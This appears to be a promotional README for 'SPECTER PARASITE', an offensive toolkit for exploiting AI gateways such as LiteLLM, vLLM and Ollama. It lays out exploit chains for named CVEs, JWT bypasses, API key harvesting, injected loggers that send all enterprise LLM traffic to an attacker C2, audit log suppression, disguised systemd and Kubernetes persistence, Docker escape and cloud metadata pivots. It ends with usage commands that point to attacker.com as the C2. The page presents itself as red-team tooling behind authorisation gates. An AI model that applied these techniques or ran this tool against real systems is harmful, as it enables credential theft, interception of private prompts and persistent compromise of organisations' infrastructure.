You deployed an AI gateway and called it infrastructure. We called it a target. Every LiteLLM proxy, every vLLM endpoint, every Ollama server — owned, siphoned, and transmitting your enterprise LLM traffic to us.
SPECTER PARASITE is a universal AI gateway exploitation engine. It doesn't assume a specific gateway — it detects what's running, finds the attack surface, and exploits it. Every AI gateway shares the same architecture: an HTTP endpoint, an auth layer, a config store, an outbound connection, and a process runtime. PARASITE attacks all five.
The 7 pluggable CVE modules are accelerators. The 7 remaining subsystems work against any gateway regardless of patch level. If it speaks HTTP and proxies LLM traffic, PARASITE can own it.
AUTHORIZED USE ONLY — INJECT gate requires Ed25519 PEM key (PARASITE_KEY). UNLEASHED gate additionally requires ROE file containing "gateway exploitation authorised". DESTROY gate requires exact confirmation string. All operations require explicit written authorisation.
Fingerprint 20+ gateway types via HTTP probes, response pattern matching, port hints, and banner extraction. LiteLLM, vLLM, Ollama, LM Studio, LocalAI, TGWUI, OpenWebUI, HuggingFace TGI, Triton Inference Server, Ray Serve, BentoML, MLflow Serving, Dify, Flowise, nginx-ui, and any custom OpenAI-compatible wrapper. CIDR range scanning support.
Deep auth characterisation. JWT arsenal: alg:none bypass (removes signature entirely), HS256 brute force (16 weak secrets), RS256→HS256 algorithm confusion (server's public key as HMAC secret). Werkzeug debugger PIN calculation (real SHA1+pinsalt algorithm — all inputs obtainable via LFI). Host header bypass. Default credential spray. Admin route enumeration.
7 CVE modules: CVE-2026-42271/48710 (LiteLLM BadHost+MCP RCE chain CVSS 10.0), CVE-2026-42208 (LiteLLM SQLi CVSS 9.3 — dumps litellm_proxy_keys), CVE-2026-22778 (vLLM JPEG2000 heap overflow CVSS 9.8 — real payload), CVE-2026-7482 "Bleeding Llama" (Ollama GGUF OOB heap read CVSS 9.8 — real binary), CVE-2026-33032 (nginx-ui MCP endpoint CVSS 9.8), CVE-2026-25536 (MCP cross-client session leak), CVE-2024-5483 (vLLM LoRA SSRF CVSS 9.0).
API key harvest from all sources: environment variables, config files (YAML/TOML/.env), heap dumps, LiteLLM config model list. Provider classification with burn rate: Anthropic ($3.00/hr), OpenAI ($2.50/hr), Azure OpenAI ($2.00/hr), AWS Bedrock, Google Vertex AI, Groq, Cohere, HuggingFace, DeepSeek, Mistral AI.
LiteLLM CustomLogger subclass injection — captures all prompts, responses, metadata, tool calls to attacker C2 via daemon thread (non-blocking). ASGI middleware injection for vLLM/FastAPI. nginx proxy_pass mirror intercept config. Audit log suppression (clears callbacks and success_callback lists). Every enterprise LLM query goes through you.
Cloud metadata pivot via SSRF or direct RCE: AWS IMDS v2 (PUT token first), GCP metadata server (Metadata-Flavor header), Azure MSI endpoint. K8s service account token extraction. Colocated service discovery (Qdrant, Prometheus, Redis, PostgreSQL). Provider account pivot — validate harvested keys against Anthropic/OpenAI/AWS/GCP APIs.
Persistent C2 mechanisms: systemd network-helper.service (Restart=always, masked as system service), K8s CronJob in kube-system every 6 hours, Docker escape via /var/run/docker.sock privileged container with host filesystem bind mount, LiteLLM phantom model routing (all gpt-4o traffic silently proxied through attacker endpoint). Beacon posts env+credentials every 15 minutes.
PST-{hex12} Ed25519-signed canonical JSON. WARLORD-compatible. Full MITRE ATT&CK mapping: T1190/T1552.001/T1557/T1565.001/T1078/T1071.001. MITRE ATLAS: AML.T0043/T0056/T0040/T0051. Credential burn rate calculation. Pivot chain documentation. 5 WMD classes.
LiteLLM BadHost + MCP test endpoint chained RCE. Host header bypass grants access to /mcp/test endpoint. server_url parameter receives command injection payload. Zero authentication required. Confirmed on LiteLLM <=1.83.6.
LiteLLM SQL injection in authentication path. UNION-based extraction of litellm_proxy_keys table — dumps all API keys in the database. Supports SQLite, PostgreSQL, MySQL dialects. Boolean-blind and error-based fallback modes.
vLLM video_url parameter passes to OpenCV → FFmpeg 5.1.x. Real JPEG2000 payload with XTsiz×YTsiz uint32 overflow trigger. Wrapped in valid AVI RIFF container (BITMAPINFOHEADER biCompression=0x47504A4A). Heap overflow in ff_j2k_init_component().
Ollama <=0.17.0. Real GGUF binary: tensor type 0xFFFF indexes past 27-entry ggml_type_traits[] array boundary. Heap read captures env vars, API keys, conversation history from process memory. 300K+ servers exposed at disclosure. Upload via PUT /api/blobs/sha256:{digest}.
nginx-ui unauthenticated MCP endpoint. POST /mcp with tool=nginx_config_write rewrites nginx configuration. Full NGINX config takeover without authentication. Gateway becomes transparent proxy to attacker.
MCP SDK StreamableHTTP cross-client session data leak via sequential session IDs. vLLM LoRA adapter loading SSRF — fetch_remote_model_from_url reaches AWS IMDS, GCP metadata server, Azure MSI endpoint. Cloud credential extraction from the model server itself.
SCAN: identify LiteLLM on port 4000, confidence 0.95
PROBE: detect no-auth or JWT bypass opportunity
BREACH: CVE-2026-42208 SQL injection → dump litellm_proxy_keys table
SIPHON: extract Anthropic/OpenAI/Azure keys from config YAML + env vars
INTERCEPT: inject LiteLLM CustomLogger → all enterprise LLM traffic to C2
IMPLANT: systemd network-helper.service → persistent C2 beacon
TRAVERSE: AWS IMDS v2 via SSRF → STS credentials → cloud pivot
SCAN: Ollama detected on port 11434 (/ returns "Ollama is running")
BREACH: CVE-2026-7482 — craft GGUF with tensor type 0xFFFF
BREACH: PUT /api/blobs/sha256:{digest} → POST /api/create with malicious modelfile
SIPHON: regex scan streaming response for API key patterns (sk-ant/sk-/AKIA/AIza)
REPORT: PST-signed report with harvested secrets and heap dump excerpt
SCAN: vLLM on port 8000 — /health returns vllm_version
BREACH: CVE-2024-5483 — LoRA adapter URL → AWS IMDS http://169.254.169.254/latest/meta-data/
TRAVERSE: extract instance credentials from IMDSv2 response
TRAVERSE: AWS STS GetCallerIdentity → IAM enumeration → S3/Secrets Manager pivot
No requirements. SCAN, PROBE, REPORT available.
PARASITE_KEY env var pointing to Ed25519 PEM private key. BREACH, SIPHON available.
INJECT + PARASITE_ROE_FILE containing "gateway exploitation authorised". INTERCEPT, TRAVERSE, IMPLANT available.
UNLEASHED + exact string "I UNDERSTAND THIS WILL DESTROY GATEWAY INFRASTRUCTURE". Infrastructure annihilation.
pip install -e /path/to/red-specter-specter-parasite # Scan + fingerprint a target parasite scan --target 192.168.1.100 --ports 4000,8000,11434 # Full engagement (OPEN gate — no credentials needed) parasite engage --target 192.168.1.100:4000 # With INJECT gate (BREACH + SIPHON) export PARASITE_KEY=/path/to/parasite.key parasite engage --target 192.168.1.100:4000 --gate inject # Full pipeline (UNLEASHED — includes INTERCEPT + TRAVERSE + IMPLANT) export PARASITE_KEY=/path/to/parasite.key export PARASITE_ROE_FILE=/path/to/roe.txt # must contain "gateway exploitation authorised" parasite engage --target 192.168.1.100:4000 --gate unleashed --c2-url http://attacker.com:9999